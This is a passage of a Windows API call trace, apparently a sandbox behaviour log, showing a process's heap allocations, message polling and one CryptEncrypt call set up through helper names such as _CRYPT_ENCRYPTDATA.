dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0142.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0142.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0142.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0142.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0142.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0142.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0142.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0142.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11a) returned 0x978490 [0142.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0142.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0142.363] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0142.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0142.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0142.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0142.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0142.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11a) returned 0x2e56430 [0142.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0142.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0142.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0142.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0142.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0142.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0142.363] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0142.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0142.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0142.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0142.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0142.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0142.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0142.363] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0142.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0142.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0142.364] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0142.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0142.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0142.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0142.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0142.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0142.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0142.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0142.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0142.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11a) returned 0x2e56430 [0142.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0142.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0142.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0142.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0142.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0142.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0142.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0142.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0142.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0142.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0142.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11a) returned 0x9785b8 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0142.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0142.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0142.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0142.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0142.366] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0142.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0142.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0142.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0142.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0142.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0142.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0142.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0142.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0142.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0142.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0142.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0142.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0142.366] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0142.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0142.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0142.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0142.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0142.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0142.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0142.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0142.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0142.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0142.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0142.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0142.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0142.367] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0142.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0142.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0142.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0142.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0142.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0142.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0142.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0142.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0142.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0142.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0142.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0142.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0142.367] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0142.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0142.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0142.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0142.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0142.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0142.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0142.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0142.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0142.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0142.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0142.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0142.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0142.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0142.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0142.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0142.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0142.368] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0142.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0142.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0142.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0142.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0142.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0142.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0142.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0142.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0142.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0142.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0142.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0142.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0142.369] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0142.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0142.369] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0142.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0142.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0142.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0142.369] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0142.369] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0142.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0142.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0142.369] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0142.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0142.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0142.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0142.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0142.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0142.370] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0142.370] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0142.370] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0142.370] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0142.370] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0142.370] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0142.370] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.370] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.370] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.370] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.370] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0142.370] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0142.371] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0142.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0142.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50ad0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0142.371] CryptEncrypt (in: hKey=0xa86f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x11a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x120) returned 1 [0142.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0142.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0142.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0142.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0142.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0142.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0142.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0142.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0142.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0142.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0142.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0142.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0142.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0142.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0142.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0142.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0142.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0142.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0142.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0142.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0142.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0142.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0142.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0142.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0142.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0142.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0142.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0142.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0142.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0142.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0142.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0142.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0142.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0142.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0142.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0142.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0142.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0142.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0142.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0142.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0142.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0142.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0142.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0142.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0142.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0142.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0142.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0142.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 